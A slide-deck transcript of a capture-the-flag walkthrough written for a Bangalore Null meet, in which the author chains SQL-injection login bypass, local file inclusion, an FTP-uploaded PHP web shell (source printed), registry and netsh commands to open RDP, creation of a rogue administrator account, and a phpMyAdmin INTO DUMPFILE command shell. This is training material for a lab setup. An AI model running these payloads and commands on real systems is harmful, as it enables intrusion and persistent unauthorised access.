Cracking CTFs The Sysbypass CTF


Published on

A CTF I had created for the monthly Bangalore Null Meets.

Published in: Technology
1 Like
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Cracking CTFs The Sysbypass CTF

  1. 1. Cracking CTFs - Sysbypass CTFThe WalkthroughRiyaz Walikar a.k.a karniv0rehttp://www.riyazwalikar.comThis is the third Capture the Flag setup in a series of games that I wrote for the Null meets. The aim ofthis CTF was to read the contents of a file called flag.txt. The start address was provided to behttp:// major breakthroughs are separated into levels along with a make-shift title for each one of them.Level 1 - Bypassing LoginThe application landing page on consisted of a login page. Since no usernameswhere known, an attempt was made to identify via the source code and via the error message. This didnot yield any results.The page was then tested for SQL injection and was found to be vulnerable. The error message that wasgenerated also showed the path of the application directory. The application was being run onXAMPPLite.
  2. 2. Using different combinations of username or 1=1 -- still gave errors. Finally, entering admin) -- in theusername field gave instant access into the application.Level 2 - Local File InclusionThe application post login bypass was a simple page with a drop down box having 4 colors as options(White, Red, Green, Blue).
  3. 3. When a color is selected, the page sends the name of the color via a GET request and the pagebackground color changes.Any other string passed as the color variable results in the page color to change to white. By trial anderror it was found that the application reads the <body bgcolor=green> string from files in theapplication directory. Four text files were found called white.txt, red.txt, green.txt and blue.txt.It was hence deduced that the application appends .txt to the variable passed to color via the GETrequest and attempts to open and read the contents of the file. If the file doesn’t exist, the applicationdefaults to a white background.An attempt was then made to read any other files on the hard drive. Assuming the backend OS to beWindows, an attempt was made to read the C:boot.ini file.
  4. 4. The null byte at the end of the query string was added to terminate the string so that the OS does notread the file as boot.ini.txt (the .txt being appended by the application). Since now we could make theapplication open and read files we wanted, an obvious attempt was made to read a file that containedan application shell, providing command execution via GET or POST requests. The application did notcontain any other pages and did not support the PUT method; hence an alternative method of uploadingfiles had to be searched.Level 3 - FTP File UploadA quick nmap scan with version detection showed a Microsoft FTP server running on port 4242. A moreintense version detection scan showed that the FTP server supported anonymous logins. Filezilla wasused to connect and upload shell as shown in the screenshots below.
  5. 5. The default directory for Microsoft FTP is <drive>inetpubftproot where <drive> is the drive where IISis installed. An attempt was then made to read the shell.txt file using the path../../../../inetpub/ftproot/shellThe following is the content of the shell.txt file that was uploaded. This is a simple web applicationbackdoor that executes the command passed via the text box. There are more complex shells availableon the Internet that can perform other complex functions like file upload and download, file systemfunctions and Windows registry manipulation.
  6. 6. <html><body><br /><form method="post"><input type="text" name="cmd"><input type="submit" value="Execute!"><br /><h2>Command Output</h2><pre><?phpif(isset($_POST[cmd])){ $cmd = $_POST[cmd]; if (strlen($cmd)==0){ $cmd = "true"; } system($cmd); die;}?></pre></body></html>The following screenshot shows the command input field.
  7. 7. OS commands can now be executed via this shell. Since the flag file was known to be flag.txt, an attribcommand was run on the most common locations where the file could be found. These locationsincluded the C:, the desktop directory of all the users on the system and the web application directory.Since the flag was not found on the file system, it was possible that hints to the flag file could exist in thedatabase. To find the name and credentials for the database, a copy of the index.php file was made asindex.txt in the same directory using copy index.php index.txt to be read via the browser.Level 4 - Discovering the DB ServerIt was found that the database instance was running on a different server altogether whose IP addresswas A quick nmap scan showed that all requests to were being filteredfrom my machine.
  8. 8. Since the application on was able to communicate with the DB server on,it was evident that the application server was the only way to reach the database server.
  9. 9. Level 5 - Getting Remote Desktop Access to nmap scan earlier had already shown that the RDP port 3389 was not open, as is evident below.A quick check was performed using the Windows reg command to verify whether RDP is turned on but isbeing blocked by the firewall or not. In Windows Operating Systems that run Terminal Services, theDWORD value of fDenyTSConnections at HKLMSystemCurrentControlSetControlTerminal Serverdetermines whether RDP is enabled or not. A value of 1 indicates RDP is turned off and a value of 0 turnsthe Remote Desktop Service on. A restart/logoff is not required in most cases to change the state of theRemote Desktop Service. The command to query the relevant key is as follows:reg query "HKLMSystemCurrentControlSetControlTerminal Server"Using the reg command, it was possible to remotely enable Remote Desktop on the server via the webshell. The command to add/edit an entry to the Windows registry, in this case the relevant TerminalServer key is as follows:reg add "HKLMSystemCurrentControlSetControlTerminal Server" /vfDenyTSConnections /d 0 /t REG_DWORD /fThe above command adds/updates the fDenyTSConnections whose type is a REG_DWORD with datavalue 0. The /f switch is used to tell the reg command to update the entry without asking forconfirmation.
  10. 10. After running the command, the Remote Desktop Service is enabled as evidenced by the output ofanother reg query.As explained before, a value of 0 for the fDenyTSConnections variable enables the Remote DesktopService.An nmap scan was re-run to confirm whether the RDP service was visible over the network. However,nmap still showed port 3389 in filtered state.
  11. 11. Using the command line program, netsh.exe, it is possible to view/add/update Windows firewall rulesamongst loads of other functionalities that the program offers.The following command shows the current firewall rules enabled on the server:netsh firewall show configThe output clearly shows that the firewall allows connections only on port 80 and any ports opened bythe inetinfo.exe executable, which is also responsible for the ftpd service that was running on port 4242.
  12. 12. To connect to via RDP, it was necessary to open port 3389 on the firewall using thecommand line. This can also be achieved using netsh via the following command:netsh firewall set portopening TCP 3389The netsh firewall show config output now contains the entry to allow connections on port 3389.A quick nmap scan shows the port to be open. We can then connect using mstsc and access the remoteserver.To login into the server via RDP, a valid user account is required which can be obtained by creating usersvia the web shell. The newly created user can then be added to the administrators group to be able tologin into the server.
  13. 13. Level 6 - Creating users on to connect via RDPThe following commands can be used to check current users and create a new user and add him to theadministrators group:net usersnet user riyaz pa55w0rd /addnet localgroup administrators riyaz /addnet user riyazOnce the user, riyaz here, is added to the administrator group, we can connect to the remote server viaRDP using the password pa55w0rd.
  14. 14. Level 7 - Reaching the DB ServerIt is already known that the DB server would be reachable from A command line portscanner can be uploaded via mstsc using the Local Resources sharing option. We can use Foundstone’sScanline command line port scanner with the -bp option to get service banners and to assume thesystem is up. Once sl.exe is copied to, we can execute sl -bp, via RDP orthe web shell, to find open ports on
  15. 15. Scanline detected 2 open ports, 80 (HTTP) and 3306 (MySQL) on The banners show moredetailed output regarding the servers. Since port 80 is open, we can see what site is running usingInternet Explorer on DB Server, is running XAMPPLite and phpMyAdmin is publicly accessible (defaultconfiguration). A quick check on the contents of all the databases was done to see if there is anyinformation we could use to leverage our attack, however no interesting information existed in thedatabases that could be used to gain system access.Level 8 - Gaining a Shell on phpMyAdmin we can create a file on the server that can be used to execute commands on theserver. The phpinfo() command/page available via the XAMPP home page shows the installationdirectory where we can attempt to create a php file using phpMyAdmin SQL Query Execution tab. TheSQL query that can be used to create a php file that could execute OS commands on the DB server is asgiven below:select <?php system($_GET["x"])?> into dumpfile C:xampplitephpmyadmincmd.php
  16. 16. This creates a file called cmd.php that allows execution of OS commands in the phpMyAdmin directory.This can be executed by accessing<command> from192.168.56.10. A dir command was run on the most common locations where the file could be found.These locations included the desktop directory of all the users on the system and the C drive. Theflag.txt file was found in the root of C Drive using this method.
  17. 17. Level 9 - Reading the flag.txt fileUsing the type command the contents of the C:flag.txt can be read to the screen.The CTF is completed when the string "You know what the Goauld really want from us? Minnesota.Thats what. For the fishing mostly." is mailed to the creator of the CTF, that’s me There are several different ways of reaching the flag.txt on the DB server. This walkthrough is just one ofthe most convenient and enlightening ways of doing it.Riyaz Walikar a.k.a karniv0reriyazwalikar@gmail.com